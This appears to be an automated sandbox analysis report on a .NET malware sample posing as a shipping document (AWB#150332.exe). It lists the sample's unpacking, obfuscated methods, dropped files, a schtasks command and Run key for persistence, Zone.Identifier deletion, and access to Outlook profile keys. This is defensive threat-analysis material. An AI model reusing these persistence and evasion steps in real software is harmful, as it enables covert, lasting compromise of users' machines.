                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\AWB#150332.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: AWB#150332.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: AWB#150332.exeStatic file information: File size 1061896 > 1048576
                    Source: AWB#150332.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: AWB#150332.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: yOCXb.pdbSHA256N source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
                    Source: Binary string: yOCXb.pdb source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
                    Source: Binary string: RegSvcs.pdb, source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
                    Source: Binary string: RegSvcs.pdb source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.cs.Net Code: FndLkE8bOT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.cs.Net Code: FndLkE8bOT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.AWB#150332.exe.7420000.6.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: AWB#150332.exeStatic PE information: 0xCA399BA7 [Tue Jul 6 04:57:11 2077 UTC]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02D1A3E8 pushad ; retf 052Fh9_2_02D1A4A1
                    Source: AWB#150332.exeStatic PE information: section name: .text entropy: 7.195168556276966
                    Source: nYNBzxFhCu.exe.0.drStatic PE information: section name: .text entropy: 7.195168556276966
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, Hodnf3fmJ0F1pgLDTA.csHigh entropy of concatenated method names: 'Hr2IPv9SDESMrksDkBH', 'E2BhJA9WmU2rDnisdP7', 'XBCerRlEbZ', 'njCeYXGpKL', 'FK5envoTTl', 'RgRYnJ97slYHGWvVsdW', 'wqR3Uf9Bqct0AnKpdVO', 'jsBAEb9ffunvCaiHTHr'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, at3b3xmnGyEskGCHyA.csHigh entropy of concatenated method names: 'l0UYyBHndE', 'Ag8YaBFPgq', 'NkwYYqjtOW', 'SNPYxpLycQ', 'd5BY8O0fJb', 'SWUYGEBrXR', 'Dispose', 'vRmriPuNYL', 'yvBrdx4QqL', 'rYorO08S06'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, S2Iy5WlxSJyE8NUWu6.csHigh entropy of concatenated method names: 'DBeDMDoEqM', 'UdmD3qOcSX', 'e8KOKWaDYq', 'kobOpmgFhZ', 'bQ5OQmWr6Q', 'C5GO90qMGY', 'RmvO01N0mA', 'QkQOts8K0W', 'QGeOCfdqOT', 'JPoOSNGcp9'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, rVI1acIAgv2sATTDcU.csHigh entropy of concatenated method names: 'rPxySgcyt2', 'rSqy7QfEuk', 'zhOyItoTCj', 'QUSyFQHn27', 'yu0yfaovdt', 'WvsyKAI2F7', 'ulDypZ2WGR', 'tnNyQmqGwA', 'PM3y9RqXf8', 'eFIy0QNdTN'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, tv0t2LuCEkxATlJfYn.csHigh entropy of concatenated method names: 'cf0kQgLVk', 'tA8HAEqOW', 'AWTP9sZKj', 'HKM3UiZWj', 'odwoOUMK2', 'yg2lttQgl', 'YUbaQplFGvkLnXSxBI', 'uhbY6kuE2k1uSL5RcI', 'AsLPukNJN5dFi0y5vJ', 'qcFrkuvmM'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ar6Pr7jX4JwtBS6ZWHN.csHigh entropy of concatenated method names: 'g5qxTUynVE', 'Ov9xz1aTPv', 'J63vcautjh', 'vHdJwr0MWHTHSyrFWQn', 'X0YiRP0490HSk7A9bKA', 'bD0uAP0e7hVpas0bq66', 'mGIUaR0yOkMs1vVsfRl'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, zJo1a8jj7x8frZOqKMX.csHigh entropy of concatenated method names: 'WifnTNXdbx', 'WBgnzwwwXw', 'U1kxcCJf8j', 'qEoxjH4JCM', 'qD9xuxZoMd', 'ixHxXaTG2o', 'JdvxLnswh2', 'QKdxBF7pg6', 'FadxiGADwY', 'BakxdtUeIx'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, ggDhDq4tlwpXTjQJB8.csHigh entropy of concatenated method names: 'iB3XBZMY5j', 'PGQXiK3exq', 'IomXdQhfYm', 'iVtXOUPK1J', 'Dg7XDQF5bQ', 'TiBXegijI2', 'v9XXVpsjc7', 'CGxX4xaXDK', 'x3dXRxbhRQ', 'sgkXWtNxB8'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, l6JybvqVYHBQ8kMRwb.csHigh entropy of concatenated method names: 'YqueB7NyPL', 'cd3edw2E4i', 'vM1eDyGYDh', 'cNMeVGNFST', 'oEme4SogFh', 'khuDJXrQh3', 'NbCD6qELH4', 'klJDmoHTyn', 'ktFDANUwdP', 't0JDwoLluN'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, s03LTHjLA1w2jfFCrUN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpMvYRoapQ', 'TmOvn6HyeJ', 'XntvxtGyLW', 'Q9UvvoPGgi', 'FMCv8fQVqj', 'p96vEpk0Xg', 'NmmvGWBiUm'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, lDP3Ch5EoLPVd32YXa.csHigh entropy of concatenated method names: 'AcCNsCJHXq', 'RUNNoqqYpW', 'akNNq1h4w6', 'FKyNfNfmIu', 'svUNpLkl1k', 've4NQdZIsa', 'hH6N0kbGSW', 'NBUNt62BbB', 'bHiNSOLf4R', 'pulNgybfQo'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, Utb578L46Zwqhd8BDt.csHigh entropy of concatenated method names: 'P6UjVoMJA2', 'qKUj4L4yKF', 'da3jWKR8ii', 'G7LjhE22Iy', 'nUWjyu6R6J', 'obvjbVYHBQ', 'N7rtCWv7Xkbkau7Hmb', 'py5GqgbUI2idP8Wio1', 'WWijjf4SDk', 'mHAjXO9fGv'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, mMGN2r0W9pGxDAdddf.csHigh entropy of concatenated method names: 'Ac2Viu4yE4', 'DTNVO7IkuR', 'aqNVe7uEMV', 'vBHeT7JH3y', 'H97ezVLmdr', 'CGeVcFT0bc', 'hGRVjvkR0N', 'x3tVunIlib', 'ssKVXo2f2c', 'PVmVLiYbU5'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, SEWwdLoa3KR8iiq7LE.csHigh entropy of concatenated method names: 'fwuOHu0OOF', 'CkaOPileGJ', 'fnROs6ucse', 'QlpOoFRxog', 'OZvOyarxo6', 'lDHObnJkRD', 'jGuOaiA2Xv', 'Vu0OrAvRyv', 'OqtOYnIsAr', 'QeyOndePFR'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, uNECFgwj2YbtqBbAwF.csHigh entropy of concatenated method names: 'G66YqN3K3V', 'VoQYf9qIw7', 'yf8YKIwbDa', 'gf8YpMdfbw', 'ypcYQJlxRp', 'YE1Y99U2vc', 'pwwY0fraW4', 'N50YtktbYm', 'FI4YCSnmTO', 'YR1YSm5JT7'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, n3gSsCzwftoMMITv1Q.csHigh entropy of concatenated method names: 'w6bnPlj3na', 'LWWnsG2iFx', 'fdnnocT5X4', 'byvnq3L1Qj', 'IRGnf7P5fE', 'OgUnpRHGLu', 'BFknQy4oiP', 'vACnGcnq1a', 'jeAnUGg0bg', 'RkCn1KAWeC'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, yoMJA2saKUL4yKFFtX.csHigh entropy of concatenated method names: 'yuBdIWgdWg', 'SO0dFCxoHR', 'DIjd2bR8tT', 'vI6dZvyeuJ', 'rCJdJSUuRp', 'hdVd6at2OE', 'ahPdmCZAqt', 'VaFdA2Kgbo', 'YTPdwNUmOG', 'FTedTitXmD'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, kciKXVdSgxq58c4Lp7.csHigh entropy of concatenated method names: 'Dispose', 'oEsjwkGCHy', 'sGXufiekN9', 'AlT5grjPrc', 'XQfjTAnykZ', 'PnXjzExq69', 'ProcessDialogKey', 'HlxucNECFg', 'b2YujbtqBb', 'XwFuupagj6'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, mPjo8m66k5QP2xA7CE.csHigh entropy of concatenated method names: 'SYgaANxflO', 'GvQaTCaviv', 'SpArcoPvQq', 'ImGrjLrjkb', 'dP7agbkCwi', 'e1Ea7ZrQks', 'M8Qa5Fd8jI', 'o79aIWvl2C', 'B2WaFuVxRN', 'V7aa2YrLJR'
                    Source: 0.2.AWB#150332.exe.4297e20.4.raw.unpack, qlCC5HCPghi2Lpc6hL.csHigh entropy of concatenated method names: 'kcVVURe2tn', 'TtuV19mhUp', 'fr2VkdhMtf', 'pbNVHJsh3u', 'FpCVMJPQh4', 'RcyVPfcSep', 'XeNV3921v5', 't1SVsKgBE7', 'bVQVoltYc4', 'mQ5Vl1IxBe'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, Hodnf3fmJ0F1pgLDTA.csHigh entropy of concatenated method names: 'Hr2IPv9SDESMrksDkBH', 'E2BhJA9WmU2rDnisdP7', 'XBCerRlEbZ', 'njCeYXGpKL', 'FK5envoTTl', 'RgRYnJ97slYHGWvVsdW', 'wqR3Uf9Bqct0AnKpdVO', 'jsBAEb9ffunvCaiHTHr'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, at3b3xmnGyEskGCHyA.csHigh entropy of concatenated method names: 'l0UYyBHndE', 'Ag8YaBFPgq', 'NkwYYqjtOW', 'SNPYxpLycQ', 'd5BY8O0fJb', 'SWUYGEBrXR', 'Dispose', 'vRmriPuNYL', 'yvBrdx4QqL', 'rYorO08S06'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, S2Iy5WlxSJyE8NUWu6.csHigh entropy of concatenated method names: 'DBeDMDoEqM', 'UdmD3qOcSX', 'e8KOKWaDYq', 'kobOpmgFhZ', 'bQ5OQmWr6Q', 'C5GO90qMGY', 'RmvO01N0mA', 'QkQOts8K0W', 'QGeOCfdqOT', 'JPoOSNGcp9'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, rVI1acIAgv2sATTDcU.csHigh entropy of concatenated method names: 'rPxySgcyt2', 'rSqy7QfEuk', 'zhOyItoTCj', 'QUSyFQHn27', 'yu0yfaovdt', 'WvsyKAI2F7', 'ulDypZ2WGR', 'tnNyQmqGwA', 'PM3y9RqXf8', 'eFIy0QNdTN'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, tv0t2LuCEkxATlJfYn.csHigh entropy of concatenated method names: 'cf0kQgLVk', 'tA8HAEqOW', 'AWTP9sZKj', 'HKM3UiZWj', 'odwoOUMK2', 'yg2lttQgl', 'YUbaQplFGvkLnXSxBI', 'uhbY6kuE2k1uSL5RcI', 'AsLPukNJN5dFi0y5vJ', 'qcFrkuvmM'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ar6Pr7jX4JwtBS6ZWHN.csHigh entropy of concatenated method names: 'g5qxTUynVE', 'Ov9xz1aTPv', 'J63vcautjh', 'vHdJwr0MWHTHSyrFWQn', 'X0YiRP0490HSk7A9bKA', 'bD0uAP0e7hVpas0bq66', 'mGIUaR0yOkMs1vVsfRl'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, zJo1a8jj7x8frZOqKMX.csHigh entropy of concatenated method names: 'WifnTNXdbx', 'WBgnzwwwXw', 'U1kxcCJf8j', 'qEoxjH4JCM', 'qD9xuxZoMd', 'ixHxXaTG2o', 'JdvxLnswh2', 'QKdxBF7pg6', 'FadxiGADwY', 'BakxdtUeIx'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, ggDhDq4tlwpXTjQJB8.csHigh entropy of concatenated method names: 'iB3XBZMY5j', 'PGQXiK3exq', 'IomXdQhfYm', 'iVtXOUPK1J', 'Dg7XDQF5bQ', 'TiBXegijI2', 'v9XXVpsjc7', 'CGxX4xaXDK', 'x3dXRxbhRQ', 'sgkXWtNxB8'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, l6JybvqVYHBQ8kMRwb.csHigh entropy of concatenated method names: 'YqueB7NyPL', 'cd3edw2E4i', 'vM1eDyGYDh', 'cNMeVGNFST', 'oEme4SogFh', 'khuDJXrQh3', 'NbCD6qELH4', 'klJDmoHTyn', 'ktFDANUwdP', 't0JDwoLluN'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, s03LTHjLA1w2jfFCrUN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpMvYRoapQ', 'TmOvn6HyeJ', 'XntvxtGyLW', 'Q9UvvoPGgi', 'FMCv8fQVqj', 'p96vEpk0Xg', 'NmmvGWBiUm'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, lDP3Ch5EoLPVd32YXa.csHigh entropy of concatenated method names: 'AcCNsCJHXq', 'RUNNoqqYpW', 'akNNq1h4w6', 'FKyNfNfmIu', 'svUNpLkl1k', 've4NQdZIsa', 'hH6N0kbGSW', 'NBUNt62BbB', 'bHiNSOLf4R', 'pulNgybfQo'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, Utb578L46Zwqhd8BDt.csHigh entropy of concatenated method names: 'P6UjVoMJA2', 'qKUj4L4yKF', 'da3jWKR8ii', 'G7LjhE22Iy', 'nUWjyu6R6J', 'obvjbVYHBQ', 'N7rtCWv7Xkbkau7Hmb', 'py5GqgbUI2idP8Wio1', 'WWijjf4SDk', 'mHAjXO9fGv'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, mMGN2r0W9pGxDAdddf.csHigh entropy of concatenated method names: 'Ac2Viu4yE4', 'DTNVO7IkuR', 'aqNVe7uEMV', 'vBHeT7JH3y', 'H97ezVLmdr', 'CGeVcFT0bc', 'hGRVjvkR0N', 'x3tVunIlib', 'ssKVXo2f2c', 'PVmVLiYbU5'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, SEWwdLoa3KR8iiq7LE.csHigh entropy of concatenated method names: 'fwuOHu0OOF', 'CkaOPileGJ', 'fnROs6ucse', 'QlpOoFRxog', 'OZvOyarxo6', 'lDHObnJkRD', 'jGuOaiA2Xv', 'Vu0OrAvRyv', 'OqtOYnIsAr', 'QeyOndePFR'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, uNECFgwj2YbtqBbAwF.csHigh entropy of concatenated method names: 'G66YqN3K3V', 'VoQYf9qIw7', 'yf8YKIwbDa', 'gf8YpMdfbw', 'ypcYQJlxRp', 'YE1Y99U2vc', 'pwwY0fraW4', 'N50YtktbYm', 'FI4YCSnmTO', 'YR1YSm5JT7'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, n3gSsCzwftoMMITv1Q.csHigh entropy of concatenated method names: 'w6bnPlj3na', 'LWWnsG2iFx', 'fdnnocT5X4', 'byvnq3L1Qj', 'IRGnf7P5fE', 'OgUnpRHGLu', 'BFknQy4oiP', 'vACnGcnq1a', 'jeAnUGg0bg', 'RkCn1KAWeC'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, yoMJA2saKUL4yKFFtX.csHigh entropy of concatenated method names: 'yuBdIWgdWg', 'SO0dFCxoHR', 'DIjd2bR8tT', 'vI6dZvyeuJ', 'rCJdJSUuRp', 'hdVd6at2OE', 'ahPdmCZAqt', 'VaFdA2Kgbo', 'YTPdwNUmOG', 'FTedTitXmD'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, kciKXVdSgxq58c4Lp7.csHigh entropy of concatenated method names: 'Dispose', 'oEsjwkGCHy', 'sGXufiekN9', 'AlT5grjPrc', 'XQfjTAnykZ', 'PnXjzExq69', 'ProcessDialogKey', 'HlxucNECFg', 'b2YujbtqBb', 'XwFuupagj6'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, mPjo8m66k5QP2xA7CE.csHigh entropy of concatenated method names: 'SYgaANxflO', 'GvQaTCaviv', 'SpArcoPvQq', 'ImGrjLrjkb', 'dP7agbkCwi', 'e1Ea7ZrQks', 'M8Qa5Fd8jI', 'o79aIWvl2C', 'B2WaFuVxRN', 'V7aa2YrLJR'
                    Source: 0.2.AWB#150332.exe.7540000.7.raw.unpack, qlCC5HCPghi2Lpc6hL.csHigh entropy of concatenated method names: 'kcVVURe2tn', 'TtuV19mhUp', 'fr2VkdhMtf', 'pbNVHJsh3u', 'FpCVMJPQh4', 'RcyVPfcSep', 'XeNV3921v5', 't1SVsKgBE7', 'bVQVoltYc4', 'mQ5Vl1IxBe'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\AWB#150332.exeFile created: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | delete
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
